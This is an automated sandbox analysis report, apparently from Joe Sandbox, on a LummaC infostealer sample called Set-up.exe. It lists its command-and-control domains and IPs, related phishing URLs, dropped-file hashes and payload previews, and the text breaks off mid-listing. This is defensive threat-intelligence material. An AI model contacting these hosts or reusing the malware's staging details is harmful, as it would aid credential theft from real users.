                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://ocsp.rootca1.amazontrust.com0:Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.ecosia.org/newtab/Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-up.exe, 00000000.00000003.2156475441.00000000035CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.microsoftcSet-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://ac.ecosia.org/autocomplete?q=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://laborersquei.click/apibSet-up.exe, 00000000.00000003.2131714421.00000000007A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-up.exe, 00000000.00000003.2155357512.000000000355D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://laborersquei.click/cSet-up.exe, 00000000.00000003.2215853185.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300627887.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312625508.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300945693.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2301046960.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://ocsp.securetrust.com/0?Set-up.exe, 00000000.00000003.2300700685.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-up.exe, 00000000.00000003.2132766034.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132707546.00000000034E8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132658075.00000000034EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            104.21.37.128
                                                                                            		klipvumisui.shopUnited States
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            188.114.96.3
                                                                                            		laborersquei.clickEuropean Union
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            185.161.251.21
                                                                                            		cegu.shopUnited Kingdom
                                                                                            		5089NTLGBfalse

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1582492
                                                                                            Start date and time:2024-12-30 18:12:11 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 11m 3s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:37
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:Set-up.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@59/15@4/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 33.3%
                                                                                            HCA Information:Failed
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target BrightLib.exe, PID 5860 because there are no executed function
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 3868 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • VT rate limit hit for: Set-up.exe

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            12:13:09API Interceptor9x Sleep call for process: Set-up.exe modified
                                                                                            12:13:20API Interceptor17x Sleep call for process: powershell.exe modified
                                                                                            12:14:18API Interceptor1x Sleep call for process: BrightLib.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.21.37.128@Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    188.114.96.3QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • filetransfer.io/data-package/u7ghXEYp/download
                                                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.mffnow.info/1a34/
                                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.mydreamdeal.click/1ag2/
                                                                                                    SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.questmatch.pro/ipd6/
                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                    need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.rtpwslot888gol.sbs/jmkz/
                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                    http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                    • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                    • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                    • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                    185.161.251.21installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                          MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                  Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      cegu.shopinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      laborersquei.clickinstaller_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 172.67.166.49
                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.89.250
                                                                                                                      @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.166.49
                                                                                                                      installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                      • 172.67.166.49
                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.89.250
                                                                                                                      klipvumisui.shopinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.208.58
                                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.208.58
                                                                                                                      installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.208.58
                                                                                                                      Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.37.128

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.0.151
                                                                                                                      https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                      • 104.17.25.14
                                                                                                                      random.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.64.143
                                                                                                                      https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                      • 104.18.87.62
                                                                                                                      BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 172.64.41.3
                                                                                                                      UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.148.118
                                                                                                                      https://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.18.35.227
                                                                                                                      CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.0.151
                                                                                                                      https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                      • 104.17.25.14
                                                                                                                      random.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.64.143
                                                                                                                      https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                      • 104.18.87.62
                                                                                                                      BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 172.64.41.3
                                                                                                                      UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.148.118
                                                                                                                      https://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.18.35.227
                                                                                                                      NTLGBbotx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 82.31.53.184
                                                                                                                      botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 62.31.100.59
                                                                                                                      loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 82.37.70.27
                                                                                                                      loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 82.42.160.251
                                                                                                                      loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 163.164.159.5
                                                                                                                      sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 86.17.1.166
                                                                                                                      x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                      • 82.16.218.110
                                                                                                                      installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.161.251.21
                                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 185.161.251.21

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21
                                                                                                                      6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.37.128
                                                                                                                      • 188.114.96.3
                                                                                                                      • 185.161.251.21

                                                                                                                      Dropped Files

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dllinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                        @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                          C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@...e.................................,..............@..........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\757b4941

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6447207
                                                                                                                                                Entropy (8bit):7.998441497232368
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

                                                                                                                                                C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):8767044
                                                                                                                                                Entropy (8bit):7.960152326344281
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dufn5yf.wk3.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gcqwxqa3.cup.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
